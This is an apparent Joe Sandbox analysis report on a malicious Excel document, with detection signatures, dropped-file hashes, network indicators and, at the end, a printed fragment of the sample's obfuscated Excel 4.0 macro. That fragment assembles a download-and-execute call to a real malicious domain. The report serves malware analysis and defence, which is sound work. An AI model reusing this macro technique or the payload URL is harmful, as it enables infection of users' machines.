Play interactive tourEdit tour
Analysis Report SecuriteInfo.com.Trojan.Agent.FFFK.8079.3665
Overview
General Information
Sample Name: | SecuriteInfo.com.Trojan.Agent.FFFK.8079.3665 (renamed file extension from 3665 to xls) |
Analysis ID: | 383014 |
MD5: | a7c64329efaea29a2dc97ced238490f7 |
SHA1: | 5d4b9b386354444cf74fd858e3409f0294c45330 |
SHA256: | 8ee305eec94aaef24116983ceef933359fb860ab50787b7963c3f46fe751630c |
Infos: | |
Most interesting Screenshot: |
Detection
Hidden Macro 4.0
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Document exploit detected (drops PE files)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Office process drops PE file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_EnableContent_String_Gen | Detects suspicious string that asks to enable active content in Office Doc | Florian Roth |
|
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
Click to jump to signature section
Show All Signature Results
AV Detection: |
---|
Antivirus detection for URL or domain | Show sources |
Source: | Avira URL Cloud: |
Multi AV Scanner detection for domain / URL | Show sources |
Source: | Virustotal: | Perma Link |
Multi AV Scanner detection for dropped file | Show sources |
Source: | Virustotal: | Perma Link |
Multi AV Scanner detection for submitted file | Show sources |
Source: | Virustotal: | Perma Link |
Source: | File opened: |
Source: | Binary string: |
Software Vulnerabilities: |
---|
Document exploit detected (drops PE files) | Show sources |
Source: | File created: | Jump to dropped file |
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: |
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: |
Source: | File created: | Jump to behavior |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: | ||
Source: | Initial sample: |
Office process drops PE file | Show sources |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | Memory allocated: | ||
Source: | Memory allocated: |
Source: | OLE indicator, VBA macros: |
Source: | Dropped File: | ||
Source: | Dropped File: |
Source: | Matched rule: |
Source: | Binary or memory string: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | OLE indicator, Workbook stream: |
Source: | File read: | Jump to behavior |
Source: | Key opened: |
Source: | Process created: |
Source: | Virustotal: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Window detected: |
Source: | Key opened: |
Source: | File opened: |
Source: | Binary string: |
Source: | Code function: |
Source: | Code function: |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Boot Survival: |
---|
Drops PE files to the user root directory | Show sources |
Source: | File created: | Jump to dropped file |
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: |
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Code function: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Source: | Code function: |
Source: | Process created: | ||
Source: | Process created: |
Source: | Key value queried: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting11 | Path Interception | Process Injection11 | Masquerading121 | OS Credential Dumping | Security Software Discovery11 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Ingress Tool Transfer2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Native API1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | File and Directory Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | Exploitation for Client Execution33 | Logon Script (Windows) | Logon Script (Windows) | Process Injection11 | Security Account Manager | System Information Discovery3 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol12 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting11 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information1 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Rundll321 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
13% | Virustotal | Browse |
Dropped Files |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
22% | Virustotal | Browse | ||
5% | Metadefender | Browse | ||
2% | ReversingLabs | Win32.Trojan.Trickpak | ||
5% | Metadefender | Browse | ||
2% | ReversingLabs | Win32.Trojan.Trickpak |
Unpacked PE Files |
---|
Source | Detection | Scanner | Label | Link | Download |
---|---|---|---|---|---|
100% | Avira | TR/Crypt.XPACK.Gen | Download File |
Domains |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
4% | Virustotal | Browse |
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
13% | Virustotal | Browse | ||
100% | Avira URL Cloud | malware | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
revolet-sa.com | 192.232.249.186 | true | false |
| unknown |
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| low | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
192.232.249.186 | revolet-sa.com | United States | 46606 | UNIFIEDLAYER-AS-1US | false |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 383014 |
Start date: | 07.04.2021 |
Start time: | 05:53:16 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 21s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | SecuriteInfo.com.Trojan.Agent.FFFK.8079.3665 (renamed file extension from 3665 to xls) |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 7 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.expl.evad.winXLS@7/8@1/1 |
EGA Information: | Failed |
HDC Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
05:53:40 | API Interceptor |
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
192.232.249.186 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Domains |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
revolet-sa.com | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
UNIFIEDLAYER-AS-1US | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
C:\Users\user\sdbybsd.fds | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ySiCz[1].fbx | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse |
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 688241 |
Entropy (8bit): | 7.064532901692121 |
Encrypted: | false |
SSDEEP: | 12288:9SeIHklNAPLJNfQPJt7TQJK7FvEVxw0xxteW:AklUjfQHDezxxtx |
MD5: | 7DF0611CD75FA4C02B29070728C37247 |
SHA1: | 1095F8922D93458EFBC97612D8A5DEA8DB8325A5 |
SHA-256: | AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1 |
SHA-512: | 167B19FE1154C3988A546F9626CD8918363EAB58D5BB49106000EF4E6E9AC0174A04B7341A67BF85CA1F9AB40C409F878C4AFA07BE941FEAADA7AFA996A4EA59 |
Malicious: | true |
Antivirus: | |
Joe Sandbox View: | |
Reputation: | low |
IE Cache URL: | http://revolet-sa.com/files/countryyelow.php |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 67965 |
Entropy (8bit): | 7.8795190850591 |
Encrypted: | false |
SSDEEP: | 1536:Ltke3BrWGHJyW32AeWviHcM8OlMVGoIahaDHTU6hryF70f:LqeRrW2JyW32AiHD2sTU2yF70f |
MD5: | ACD684D03FB00D3EDE4EF36D090E2892 |
SHA1: | 98C38FA7130CE3ADF7656D7C9E1410051C7DF775 |
SHA-256: | 007AD2692E7E4E40D9D9AACF2F68D1B7956DF881C8D0AF2B41569950BF2CA4ED |
SHA-512: | BFE2AD8D06CFCD31845728428CFF7F89748B8CF4A172872D0C85ACBE912A53858A3A90FB180EEDA81294821C029B1413DA9397F814889C2074368EDA35727EB8 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Windows\SysWOW64\rundll32.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2178 |
Entropy (8bit): | 6.992231725533755 |
Encrypted: | false |
SSDEEP: | 24:NKf5b6UkxAB8LRnbAwdZhE8/mHeYKf5b6UKjqA6YYUWG538Mhh5FB5tFId4UcP0z:Kb6UH8Ltk1Mm+Bb6UFAH6mBFBS4UcLuj |
MD5: | A9C113D8B90FCF3F0B90699048A6D136 |
SHA1: | D3764B8EA6F98EE7B6768F32F9AC504B8F5397B5 |
SHA-256: | 239AD9A1493D03A978E94CE064598C68D4F82056886C0D403477B63317260AC9 |
SHA-512: | FDFFE41FE43B9A4789053909A610C4AAE1F974E6D818D5D685D2CAA99BEE15F949089A25F4AB416381784F3B4625F145C99CA051188BB79593DAF8C9BBDAEB53 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.475918729490231 |
Encrypted: | false |
SSDEEP: | 12:85QZ+cLgXg/XAlCPCHaXtB8XzB/RUvX+WnicvbwbDtZ3YilMMEpxRljKlcTdJP9O:85A+K/XTd6j0YegDv3qfrNru/ |
MD5: | 44C685D9F27C5D4389C82A76E63BE69C |
SHA1: | 29408FEA1972853446414948D64054ECBCBA3D0E |
SHA-256: | BA1D65408DD9BA2B20995E2A49F823D7F4F968CA65B8D477F0531A9744881509 |
SHA-512: | 9298E13DC3CA5BAF93E20E631B1E903EDAE998891D1A9DB58BA96CE9F08032593E6EB03F01860477AC9B84CC0267770F42E07868E0E3439DD0BC2925A6F20CBE |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2318 |
Entropy (8bit): | 4.573810904271115 |
Encrypted: | false |
SSDEEP: | 48:8T/XT0jtH+NAHNfQh2T/XT0jtH+NAHNfQ/:8T/XojtcmfQh2T/XojtcmfQ/ |
MD5: | 7A6712A397C39A608B402FB08F51D055 |
SHA1: | 708B6D4ACCF27C74C2E2A541B14B95FC32FCF065 |
SHA-256: | 1CF0635DFA3533DBB3CA1CE8B5A5C80FDA4E0C2038049B36F1554FA851B12BD9 |
SHA-512: | 872C25D4E8D9FC1A7D020E2D379BA9C08B13C3ACAA49CC5A18C8E2DD1C4F21B572CA330D84BDF34A6AE4E4401A56A7CBF7609BF8F0C0B49527C0C2B531478730 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 170 |
Entropy (8bit): | 4.888657403242958 |
Encrypted: | false |
SSDEEP: | 3:oyBVomM0b3kVsLBVouscb3kVsLBVomM0b3kVsLBVov:dj60gVsLBVVgVsLBV60gVsLBVy |
MD5: | 77A0BBADB3E68BC0A632C215D9A38372 |
SHA1: | D2F8B90CBAFB167744DF998488137E83FADB51F4 |
SHA-256: | 999982418F347FD2A25818225C5B61106CA2B8C16F3558C45251E4C228E75C9D |
SHA-512: | C32CCAA1D4E1E47813CEACD4F25C158A004917AD4B315AFB24CCD79A37A5E0E4A966560F36432B47184ADF869F86854E8C3A95F1F3FD1085B2EB1BBD953EAABF |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 127008 |
Entropy (8bit): | 7.230390922283029 |
Encrypted: | false |
SSDEEP: | 3072:ZI8rmjAItyzElBIL6lECbgBGGP5xLmuCSi2jTUqyF70Si2W2vXmwgvXmw3I8rmjo:G8rmjAItyzElBIL6lECbgBvP5NmuCShR |
MD5: | 435860799AF28567EABD1AEC443E69B0 |
SHA1: | D6950FED25AB8CEC5E1DAA1AF55F82CF1A6EBD58 |
SHA-256: | 54CBCFCA263513798A7D7C63CCFDAD67CDB987B966E6CFB22F26212AEDFFC814 |
SHA-512: | 9EA1B2DF35800E7B24DC09D18E2F91D9760641812FDBD72310F071503C2DA1F5B5F859315F3EA4B4BE06D9CBAFC77B3A7EB1E3AB0E9B6042FCD5D1D462332774 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 688241 |
Entropy (8bit): | 7.064532901692121 |
Encrypted: | false |
SSDEEP: | 12288:9SeIHklNAPLJNfQPJt7TQJK7FvEVxw0xxteW:AklUjfQHDezxxtx |
MD5: | 7DF0611CD75FA4C02B29070728C37247 |
SHA1: | 1095F8922D93458EFBC97612D8A5DEA8DB8325A5 |
SHA-256: | AC17E1F54B9F800D874E1D012E541FC037BD1A31EE3E8F631A454F2D1DE6ADA1 |
SHA-512: | 167B19FE1154C3988A546F9626CD8918363EAB58D5BB49106000EF4E6E9AC0174A04B7341A67BF85CA1F9AB40C409F878C4AFA07BE941FEAADA7AFA996A4EA59 |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: | |
Reputation: | low |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 3.087349849990019 |
TrID: |
|
File name: | SecuriteInfo.com.Trojan.Agent.FFFK.8079.xls |
File size: | 267776 |
MD5: | a7c64329efaea29a2dc97ced238490f7 |
SHA1: | 5d4b9b386354444cf74fd858e3409f0294c45330 |
SHA256: | 8ee305eec94aaef24116983ceef933359fb860ab50787b7963c3f46fe751630c |
SHA512: | f7be46dad7af7216a65c5a58766eb20a2e847a787ddb19f9b6520d7e5c81836c8382911743ab13ad171145aadddaa1a43a05c93c5ba3b287d862cf3045bc1dbf |
SSDEEP: | 6144:JcPiTQAVW/89BQnmlcGvgZ7rDjo8UOMIJK+xTh0+:Fh+ |
File Content Preview: | ........................>...................................................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4eea286a4b4bcb4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "SecuriteInfo.com.Trojan.Agent.FFFK.8079.xls" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Excel |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | True |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Code Page: | 1251 |
Last Saved By: | |
Create Time: | 2006-09-16 00:00:00 |
Last Saved Time: | 2021-04-06 14:04:37 |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Document Code Page: | 1251 |
Thumbnail Scaling Desired: | False |
Contains Dirty Links: | False |
Streams |
---|
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.348065102689 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c s 3 . . . . . D o c s 1 . . . . . D o c s 2 . . . . . D o c s 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 d0 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 8d 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 05 00 00 00 |
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.24280443857 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . d . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . H L . . * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 84 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 08 00 00 00 40 00 00 00 12 00 00 00 4c 00 00 00 0c 00 00 00 64 00 00 00 0d 00 00 00 70 00 00 00 13 00 00 00 7c 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 35 00 00 00 1e 00 00 00 |
Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 255780 |
---|
General | |
---|---|
Stream Path: | Book |
File Type: | Applesoft BASIC program data, first line number 8 |
Stream Size: | 255780 |
Entropy: | 3.03349063455 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . 5 B . . . . . . . . . . . . . . . . . . . . . . . D o c s 1 . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . 7 . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . |
Data Raw: | 09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 01 35 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 |
Macro 4.0 Code |
---|
,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=FORMULA(Docs3!$BE$26&Docs3!$BE$27&Docs3!$BE$28&""n"",BV9)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=Docs2!AI20()",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=EXEC(""r""&Docs3!BB33&Docs3!BB37&Docs3!BM23&Docs3!BI33&Docs3!BI36)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=ACOS(42424)=ATAN(4254254)=Docs4!BA9()",,,,,,
,,http://,,,"=""php""",,"=""revolet-sa.com/files/countryyelow""",,,,,,,,,,,,,,,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=FORMULA.ARRAY(""U""&Docs3!$BH$26&Docs3!$BH$27&Docs3!$BH$28&Docs3!$BH$29,Docs1!BV10)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)",,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(14